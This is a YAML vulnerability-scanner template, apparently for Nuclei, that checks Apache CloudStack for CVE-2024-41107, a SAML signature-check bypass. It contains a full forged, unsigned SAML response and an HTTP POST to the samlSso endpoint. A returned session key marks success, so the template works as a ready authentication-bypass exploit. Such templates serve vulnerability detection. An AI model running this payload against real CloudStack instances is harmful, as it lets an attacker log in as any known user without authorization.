50 lines
4.2 KiB
YAML
50 lines
4.2 KiB
YAML
id: CVE-2024-41107
|
|
|
|
info:
|
|
name: Apache CloudStack - SAML Signature Exclusion
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: critical
|
|
description: |
|
|
The CloudStack SAML authentication (disabled by default) does not enforce signature check. In CloudStack environments where SAML authentication is enabled, an attacker that initiates CloudStack SAML single sign-on authentication can bypass SAML authentication by submitting a spoofed SAML response with no signature and known or guessed username and other user details of a SAML-enabled CloudStack user-account
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-41107
|
|
- http://www.openwall.com/lists/oss-security/2024/07/19/1
|
|
- http://www.openwall.com/lists/oss-security/2024/07/19/2
|
|
- https://cloudstack.apache.org/blog/security-release-advisory-cve-2024-41107
|
|
- https://github.com/apache/cloudstack/issues/4519
|
|
classification:
|
|
epss-score: 0.00046
|
|
epss-percentile: 0.16798
|
|
cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: app="APACHE-CloudStack"
|
|
product: cloudstack
|
|
vendor: apache
|
|
tags: cve,cve2024,apache,cloudstack,auth-bypass
|
|
|
|
variables:
|
|
username: "{{username}}"
|
|
entityid: "{{entityid}}"
|
|
saml_id: "{{saml_id}}"
|
|
saml: '<?xml version="1.0" encoding="UTF-8"?><samlp:Response Destination="{{RootURL}}/client/api?command=samlSso" ID="_b0389fca0ea65fe8e857" InResponseTo="{{saml_id}}" IssueInstant="2024-07-30T10:48:20.307Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:xs="http://www.w3.org/2001/XMLSchema"> <saml:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">{{entityid}}</saml:Issuer> <samlp:Status xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" /> </samlp:Status> <saml:Assertion ID="_7a2993514112bbc72696" IssueInstant="2024-07-30T10:58:20.307Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema"> <saml:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">{{entityid}}</saml:Issuer> <saml:Conditions NotBefore="2024-07-30T10:43:20.307Z" NotOnOrAfter="2024-07-30T10:53:20.307Z" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"><saml:AudienceRestriction> <saml:Audience>org.apache.cloudstack</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2024-07-30T10:48:20.307Z" SessionIndex="{{saml_id}" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"> <saml:AuthnContext> <saml:AuthnContextClassRef> urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> <saml:AttributeStatement xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"> <saml:Attribute Name="uid" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified"> <saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">{{username}}</saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> </saml:Assertion></samlp:Response>'
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /client/api?command=samlSso HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
RelayState=undefined&SAMLResponse={{urlencode(base64(saml))}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "contains(header,'sessionkey')"
|
|
- "contains(content_type,'text/xml')"
|
|
- "status_code==302"
|
|
condition: and
|
|
# digest: 4a0a00473045022100a1ec6f11c45e095bf8e6789bece49e742a59cee194ef2623452009befc7f2a7902207d16ebf0b445902c98afdff49ae91fae7d6795bbf679f3d0dcb5f314cbc7ff16:922c64590222798bb761d5b6d8e72950 |